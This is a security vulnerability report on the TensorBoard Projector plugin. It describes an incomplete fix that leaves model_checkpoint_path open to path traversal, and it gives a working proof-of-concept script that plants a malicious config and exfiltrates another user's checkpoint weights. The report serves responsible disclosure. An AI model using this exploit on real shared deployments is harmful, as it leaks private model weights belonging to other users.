Reporting here as advised in https://issuetracker.google.com/issues/522459885
Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Summary
Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user-controlled asset paths in projector_config.pbtxt (metadata_path, tensor_path, bookmarks_path, and sprite.image_path) are resolved against, and confined to, the directory that contains projector_config.pbtxt. The fix did not cover a fifth user-controlled path in the same config file: model_checkpoint_path. That field is still passed straight to tf.train.load_checkpoint() with no confinement check. An attacker who can write or influence a projector_config.pbtxt under a scanned logdir (the exact threat model the #7115 fix addresses) can point model_checkpoint_path at any TensorFlow checkpoint elsewhere on the host. TensorBoard then enumerates that checkpoint's variables, advertises the two-dimensional ones in the served config, and returns their raw tensor bytes through the /data/plugin/projector/tensor route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi-tenant TensorBoard deployment is the most sensitive asset present.
Details
The fix added _rel_to_abs_asset_path() (tensorboard/plugins/projector/projector_plugin.py:212), which resolves a candidate path and rejects it when it escapes the config directory:
def _rel_to_abs_asset_path(fpath, config_fpath):
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate
The four patched fields route through this function: tensor_path (lines 380 and 680), metadata_path (line 620), bookmarks_path (line 752), and sprite.image_path (line 801). Pointing any of those at a path outside the logdir now returns a clean 400.
model_checkpoint_path does not go through this function. It is read from the attacker-controlled config in _read_latest_config_files() (text_format.Parse(file_content, config), line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in _get_reader_for_run():
# tensorboard/plugins/projector/projector_plugin.py
478    if (
479        config.model_checkpoint_path
480        and _using_tf()
481        and not tf.io.gfile.glob(config.model_checkpoint_path + "*")  # existence only
482    ):
...
498    if config.model_checkpoint_path and _using_tf():
499        try:
500            reader = tf.train.load_checkpoint(config.model_checkpoint_path)  # no confinement
There is no call to _rel_to_abs_asset_path(config.model_checkpoint_path, ...) anywhere, so the path is never confined to the config directory.
The readback is automatic and does not require the attacker to know any variable names. In _augment_configs_with_checkpoint_info() the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:
415    var_map = reader.get_variable_to_shape_map()
416    for tensor_name, tensor_shape in var_map.items():
417        if len(tensor_shape) != 2:
418            continue
...
425        embedding = config.embeddings.add()
426        embedding.tensor_name = tensor_name
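The rank filter in the excerpt above can be illustrated without TensorFlow. This is a minimal sketch, not the plugin's code: the shape map below is invented for illustration, advertised_tensor_names() is a hypothetical helper, and only the len(tensor_shape) != 2 check from the excerpt is modelled (the elided lines may apply further conditions).

```python
# Hypothetical shape map in the form returned by
# reader.get_variable_to_shape_map(): variable name -> list of dimensions.
var_map = {
    "stolen_weights": [2, 3],
    "dense/kernel": [128, 64],
    "dense/bias": [64],
    "conv/kernel": [3, 3, 16, 32],
    "global_step": [],
}


def advertised_tensor_names(shape_map):
    """Return, sorted, the names whose shape passes the rank-2 check."""
    return sorted(name for name, shape in shape_map.items() if len(shape) == 2)


names = advertised_tensor_names(var_map)
print(names)
```

Only the two rank-2 entries survive the filter, which is why the attacker needs no prior knowledge of variable names for any matrix-shaped weight.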
That augmented config is returned by /data/plugin/projector/config. The client then requests each tensor, and _serve_tensor() returns the raw bytes:
699 reader = self._get_reader_for_run(run)
...
709 tensor = reader.get_tensor(name)
...
719 data_bytes = tensor.tobytes()
720 return Respond(request, data_bytes, "application/octet-stream")
So the full chain is: the attacker plants a projector_config.pbtxt whose model_checkpoint_path points outside the logdir, the config endpoint discloses the variable names and shapes of that out-of-logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and same config message, that #7115 set out to close for the other path fields.
The read is constrained to valid TensorFlow checkpoint files (a non-checkpoint path such as /etc/passwd fails load_checkpoint() and the error is caught), so this is not an arbitrary file read. Within TensorBoard's own domain, that constraint still exposes the highest-value data on the host: trained model weights from other users' runs.
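To make the last step of the chain concrete, the sketch below shows how a client could rebuild a matrix from the raw response body once it has the shape from the config endpoint. It is an illustration under stated assumptions: the tensor is float32 in the host's native byte order (as in the PoC values), decode_float32_rows() is a hypothetical helper, and the payload is a local stand-in rather than a real HTTP response.

```python
from array import array


def decode_float32_rows(data, shape):
    """Split raw native-endian float32 bytes into the rows of a [rows, cols] tensor."""
    rows, cols = shape
    values = array("f")
    values.frombytes(data)
    if len(values) != rows * cols:
        raise ValueError("byte length does not match shape %r" % (shape,))
    return [values[r * cols:(r + 1) * cols].tolist() for r in range(rows)]


# Stand-in for the body of a tensor response; the numbers are the PoC's values.
payload = array("f", [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]).tobytes()
matrix = decode_float32_rows(payload, (2, 3))
print(matrix)
```

Because the config endpoint supplies the shape and the tensor endpoint supplies the bytes, nothing else is needed to recover the weights in their original layout.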
PoC
This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious projector_config.pbtxt that points at it, and shows the weights coming back out of the tensor endpoint.
python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py
poc_model_checkpoint_path.py:
import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".")  # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin

work = tempfile.mkdtemp(prefix="tb_poc_")

# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
                   [9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))

# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))

plugin = projector_plugin.ProjectorPlugin(
    base_plugin.TBContext(logdir=logdir, data_provider=None))

def get(handler, query):
    return Client(handler).get("/?" + query)

cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"]  # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())
Observed output:
exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
For contrast, calling the patched helper with the same out-of-logdir path is rejected:
_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory
confirming the other four fields are confined while model_checkpoint_path is not.
Impact
Information disclosure (CWE-22). An attacker who can write or influence a projector_config.pbtxt under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi-tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so this is not an arbitrary read of any file type. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining model_checkpoint_path to the config directory.
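One possible shape for that confinement is sketched below. It is an assumption about how a fix could look, not the maintainers' patch: _rel_to_abs_asset_path() is copied from the excerpt in Details, while confined_checkpoint_path() is a hypothetical wrapper that a caller would consult before invoking tf.train.load_checkpoint(). The directory names mirror the PoC layout.

```python
import os
import tempfile


def _rel_to_abs_asset_path(fpath, config_fpath):
    # Copied from the excerpt of projector_plugin.py quoted in Details.
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate


def confined_checkpoint_path(model_checkpoint_path, config_fpath):
    """Hypothetical wrapper: resolved checkpoint prefix, or None if unset or escaping."""
    if not model_checkpoint_path:
        return None
    try:
        return _rel_to_abs_asset_path(model_checkpoint_path, config_fpath)
    except ValueError:
        return None


# Layout mirroring the PoC: a shared logdir next to a victim's private directory.
root = os.path.realpath(tempfile.mkdtemp(prefix="tb_fix_"))
config_fpath = os.path.join(root, "shared_logdir", "projector_config.pbtxt")
os.makedirs(os.path.dirname(config_fpath))
victim_prefix = os.path.join(root, "victim_private", "secret_model", "model.ckpt")

inside = confined_checkpoint_path("model.ckpt", config_fpath)
outside = confined_checkpoint_path(victim_prefix, config_fpath)
traversal = confined_checkpoint_path("../victim_private/secret_model/model.ckpt", config_fpath)
print(inside, outside, traversal)
```

In this sketch a rejected path is reported as None so that the caller can skip loading a reader; whether the real fix should instead surface a 400, as the sibling fields do, is a design choice left to the maintainers.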